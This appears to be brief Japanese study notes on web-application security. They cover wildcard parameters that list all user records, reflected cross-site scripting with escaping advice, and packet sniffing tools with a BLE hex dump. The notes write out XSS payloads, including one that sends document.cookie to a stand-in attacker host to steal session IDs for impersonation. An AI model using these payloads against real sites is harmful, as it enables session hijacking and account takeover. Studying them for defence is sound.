### ユーザ情報等の全件表示
http://www.example.co.jp/cgi-bin/sample.cgi?user=hoge
Getパラメータの場合、アスタリスクにすると、全件取得できる場合がある
sample.cgi?user=*
### クロスサイトスクリプティング
受け取ったパラメータをそのまま表示する場合、コードを埋め込むと、コードが実行されてしまう
http://www.example.co.jp/cgi-bin/sample.cgi?user=hoge
http://www.example.co.jp/cgi-bin/sample.cgi?user=${コード}
パラメータをHTMLと解釈されないようにエスケープ処理する必要がある
### クロスサイトスクリプティングの例
cookie情報を表示できてしまう
"><script>alert(document.cookie)</script><!--
罠リンク: URLが圧縮されるとわからない
http://<ServerName>/xss_confirm.php?name="><script>alert(document.cookie)</script><!--
セッソンIDを盗む方法
"><script>window.location='http://trap.example.com/trap.php?'+document.cookie;</script><!--
セッション ID を入手したら、セッションIDを利用して Webアプリケーションにアクセスし、なりすましが完成する
### Sniffer
パケット盗聴用のソフト、HTTPS通信の場合は盗聴されない
Wireshark、Python3 + pySerial、nRF Snifferで環境構築ができる
デバイス単位でパケットデータを解析できる
パケットは16進数 ASCII表示
04 3e 20 02 01 04 00 df cd 64 4c 99 b4 14 0a 09 .> ......dL..... 53 65 6e 73 6f 72 54 61 67 05 12 50 00 20 03 02 SensorTag..P. .. 0a 00 ba
